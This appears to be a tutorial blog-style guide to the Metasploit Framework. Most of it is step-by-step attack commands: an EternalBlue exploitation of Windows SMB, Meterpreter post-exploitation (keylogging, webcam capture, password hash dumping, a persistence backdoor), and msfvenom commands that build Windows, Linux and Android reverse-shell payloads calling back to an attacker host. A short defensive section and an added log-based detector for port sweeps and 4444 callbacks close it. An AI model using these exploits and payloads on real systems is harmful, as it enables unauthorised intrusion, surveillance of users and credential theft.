Metasploit Framework – A Comprehensive Guide
Introduction
The Metasploit Framework (MSF) is one of the most powerful tools for penetration testing, exploitation, and security research. Developed by Rapid7, Metasploit provides a wide range of tools for discovering, exploiting, and validating vulnerabilities in networks, systems, and applications.
In this guide, we will cover:
- Metasploit Installation
- Metasploit Basics
- Exploitation with Metasploit
- Post-Exploitation Techniques
- Defensive Measures Against Metasploit Attacks
1. Installing Metasploit
Metasploit comes pre-installed in Kali Linux, but if you need to install or update it manually, follow these steps.
a) Installing on Kali Linux
sudo apt update && sudo apt install metasploit-framework -y
b) Installing on Other Linux Distros
curl https://raw.githubusercontent.com/rapid7/metasploit-framework/master/msfinstall | bash
c) Installing on Windows (via Metasploit Installer)
- Download the installer from Rapid7’s official website.
- Run the installer and follow the setup process.
2. Starting Metasploit Framework
To launch Metasploit, open a terminal and run:
msfconsole
This starts Metasploit in its interactive command-line interface.
Check Version of Metasploit
msfconsole --version
Starting the Metasploit Database
Metasploit uses a database to store exploit results and scan data. Start it using:
sudo systemctl start postgresql
sudo msfdb init
To check if the database is running:
sudo systemctl status postgresql
3. Understanding Metasploit’s Structure
Metasploit consists of multiple components:
- Exploit – Code that takes advantage of a specific vulnerability to gain execution on the target.
- Payload – The code that runs on the target once the exploit succeeds (for example a Meterpreter shell).
- Auxiliary – Modules that do not deliver a payload: scanners, fuzzers, and DoS tools.
- Encoders – Transform a payload's bytes, mainly to avoid characters the exploit cannot carry; they were historically used to dodge antivirus signatures, but modern antivirus is rarely fooled by encoding alone.
- Post-Exploitation – Modules that run inside an established session after successful exploitation.
Basic Commands in Metasploit
| Command | Description |
|---|---|
| search exploit_name | Search for exploits |
| use exploit/path | Select an exploit |
| show options | Show required options |
| set RHOSTS target_ip | Set the target IP (most current modules use RHOSTS, not RHOST) |
| set LHOST your_ip | Set the local machine IP |
| set PAYLOAD payload_name | Select a payload |
| exploit | Launch the exploit |
| sessions -l | List active sessions |
| sessions -i session_id | Interact with a session |
4. Scanning & Enumeration Using Metasploit
Metasploit provides powerful scanning and enumeration tools to gather information about the target system.
a) Scanning Open Ports from Metasploit
Metasploit ships its own TCP port-scanner auxiliary module (Nmap itself can also be run from msfconsole with db_nmap, which stores results in the database).
use auxiliary/scanner/portscan/tcp
set RHOSTS target_ip
set THREADS 10
run
b) Checking for Vulnerabilities
Use Metasploit’s built-in scanner to check for vulnerabilities.
use auxiliary/scanner/vuln/
set RHOSTS target_ip
run
5. Exploiting a Target Using Metasploit
Example: Exploiting Windows SMB (EternalBlue – MS17-010)
- Search for the exploit:
search eternalblue
- Select the exploit:
use exploit/windows/smb/ms17_010_eternalblue
- Set the target IP:
set RHOSTS target_ip
- Set the payload:
set PAYLOAD windows/meterpreter/reverse_tcp
- Set the local IP for receiving connections:
set LHOST your_ip
- Launch the exploit:
exploit
- If successful, you’ll get a Meterpreter session.
6. Post-Exploitation with Meterpreter
Once inside a system, Meterpreter provides powerful post-exploitation capabilities.
a) Checking System Info
sysinfo
b) Listing Running Processes
ps
c) Capturing Keystrokes
keyscan_start
To dump captured keystrokes:
keyscan_dump
d) Capturing a Screenshot
screenshot
e) Accessing the Webcam
webcam_list
webcam_snap
f) Dumping Password Hashes
hashdump
g) Maintaining Persistence (Creating a Backdoor)
persistence -U -i 5 -p 4444 -r your_ip
7. Creating Custom Payloads with msfvenom
Metasploit’s msfvenom tool can create payloads for different platforms.
a) Creating a Windows Reverse Shell
msfvenom -p windows/meterpreter/reverse_tcp LHOST=your_ip LPORT=4444 -f exe > shell.exe
b) Creating a Linux Reverse Shell
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=your_ip LPORT=4444 -f elf > shell.elf
c) Creating an Android Backdoor
msfvenom -p android/meterpreter/reverse_tcp LHOST=your_ip LPORT=4444 -o backdoor.apk
8. Defending Against Metasploit Attacks
While Metasploit is powerful for offensive security, understanding how to defend against it is equally important.
a) Keep Software Updated
Regularly update operating systems, applications, and firmware to patch vulnerabilities.
b) Use Firewalls and IDS/IPS
Implement firewalls, Intrusion Detection Systems (IDS), and Intrusion Prevention Systems (IPS) to monitor network traffic.
c) Enable Strong Authentication
Use multi-factor authentication (MFA) to prevent unauthorized access.
d) Restrict Admin Privileges
Limit administrator access to reduce the impact of potential exploits.
e) Monitor Network Activity
Use tools like Splunk, Wireshark, or Snort to detect suspicious activity.
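Two of the patterns the commands in this guide leave in network logs are a port sweep (auxiliary/scanner/portscan/tcp touching many ports on one host in a few seconds) and an outbound connection to the default LPORT 4444 used in the reverse_tcp and msfvenom examples. The script below is an added example, not part of the original guide; it runs that detection logic over a constructed connection log in an assumed "epoch src_ip dst_ip dst_port" format, and the internal address prefix, thresholds and port list are assumptions to tune for your own network.

```python
# Added example, not from the original guide: flags two patterns the guide's commands
# produce in connection logs: a TCP port sweep (auxiliary/scanner/portscan/tcp hitting
# many ports on one host) and an outbound connection to 4444, the default LPORT above.
from collections import defaultdict

# Constructed sample lines, format "epoch src_ip dst_ip dst_port" (not real traffic).
SAMPLE_LOG = """\
1700000000 10.0.0.5 10.0.0.20 22
1700000001 10.0.0.5 10.0.0.20 80
1700000001 10.0.0.5 10.0.0.20 135
1700000002 10.0.0.5 10.0.0.20 139
1700000002 10.0.0.5 10.0.0.20 445
1700000003 10.0.0.5 10.0.0.20 3389
1700000010 10.0.0.20 203.0.113.7 4444
1700000020 10.0.0.21 10.0.0.20 445
"""

DEFAULT_MSF_PORTS = {4444}   # msfvenom / reverse_tcp default LPORT used in this guide
SCAN_PORT_THRESHOLD = 5      # distinct ports from one src to one dst ...
SCAN_WINDOW_SECS = 10        # ... within this many seconds (assumed tuning values)

def parse_log(text):
    """Parse 'epoch src dst dport' lines into tuples, skipping malformed lines."""
    events = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) == 4 and parts[0].isdigit() and parts[3].isdigit():
            events.append((int(parts[0]), parts[1], parts[2], int(parts[3])))
    return events

def detect_port_scans(events):
    """Return {(src, dst): distinct_ports} for pairs exceeding the threshold in any window."""
    by_pair = defaultdict(list)
    for ts, src, dst, port in events:
        by_pair[(src, dst)].append((ts, port))
    hits = {}
    for pair, items in by_pair.items():
        items.sort()
        for start, _ in items:   # slide a window starting at each event
            ports = {p for t, p in items if start <= t <= start + SCAN_WINDOW_SECS}
            if len(ports) >= SCAN_PORT_THRESHOLD:
                hits[pair] = max(hits.get(pair, 0), len(ports))
    return hits

def detect_callbacks(events, internal_prefix="10.0.0."):
    """Return (src, dst, port) for internal hosts connecting out to default Metasploit ports."""
    return [(src, dst, port) for _, src, dst, port in events
            if src.startswith(internal_prefix) and not dst.startswith(internal_prefix)
            and port in DEFAULT_MSF_PORTS]
```

On the sample log this reports one sweep (10.0.0.5 probing six ports on 10.0.0.20) and one suspect callback (10.0.0.20 reaching out to port 4444); attackers can change LPORT, so the port list is a quick win rather than a complete detection.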
9. Metasploit Alternatives
While Metasploit is one of the best exploitation frameworks, there are other alternatives:
- Exploit Pack – GUI-based exploitation framework.
- BeEF – Browser Exploitation Framework.
- Canvas – Another professional exploitation tool.
- Empire – PowerShell-based post-exploitation framework.